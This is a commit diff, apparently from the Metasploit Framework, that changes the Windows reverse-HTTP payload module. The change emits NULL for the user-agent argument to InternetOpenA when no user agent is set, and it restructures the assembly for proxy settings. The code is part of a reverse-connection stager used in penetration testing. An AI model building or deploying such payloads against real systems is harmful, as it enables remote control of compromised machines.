pass NULL if the UA field is empty
Brent Cook
parent
6f8fc55b86
commit
3dca52510d
|
|
@ -255,38 +255,43 @@ module Payload::Windows::ReverseHttp
|
|||
xor ebx, ebx ; Set ebx to NULL to use in future arguments
|
||||
^
|
||||
|
||||
asm << %Q^
|
||||
internetopen:
|
||||
push ebx ; DWORD dwFlags
|
||||
^
|
||||
if proxy_enabled
|
||||
asm << %Q^
|
||||
internetopen:
|
||||
push ebx ; DWORD dwFlags
|
||||
push esp ; LPCTSTR lpszProxyBypass ("" = empty string)
|
||||
call get_proxy_server
|
||||
db "#{proxy_info}", 0x00
|
||||
get_proxy_server:
|
||||
; LPCTSTR lpszProxyName (via call)
|
||||
push 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
|
||||
call get_useragent
|
||||
db "#{opts[:ua]}", 0x00
|
||||
; LPCTSTR lpszAgent (via call)
|
||||
get_useragent:
|
||||
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
|
||||
call ebp
|
||||
^
|
||||
else
|
||||
asm << %Q^
|
||||
internetopen:
|
||||
push ebx ; DWORD dwFlags
|
||||
push ebx ; LPCTSTR lpszProxyBypass (NULL)
|
||||
push ebx ; LPCTSTR lpszProxyName (NULL)
|
||||
push ebx ; DWORD dwAccessType (PRECONFIG = 0)
|
||||
^
|
||||
end
|
||||
if opts[:ua].to_s.empty?
|
||||
asm << %Q^
|
||||
push ebx ; LPCTSTR lpszAgent (NULL)
|
||||
^
|
||||
else
|
||||
asm << %Q^
|
||||
push ebx ; LPCTSTR lpszProxyBypass (NULL)
|
||||
call get_useragent
|
||||
db "#{opts[:ua]}", 0x00
|
||||
; LPCTSTR lpszAgent (via call)
|
||||
get_useragent:
|
||||
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
|
||||
call ebp
|
||||
^
|
||||
end
|
||||
asm << %Q^
|
||||
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
|
||||
call ebp
|
||||
^
|
||||
|
||||
asm << %Q^
|
||||
internetconnect:
|
||||
|
|
|
|||
Loading…
Reference in New Issue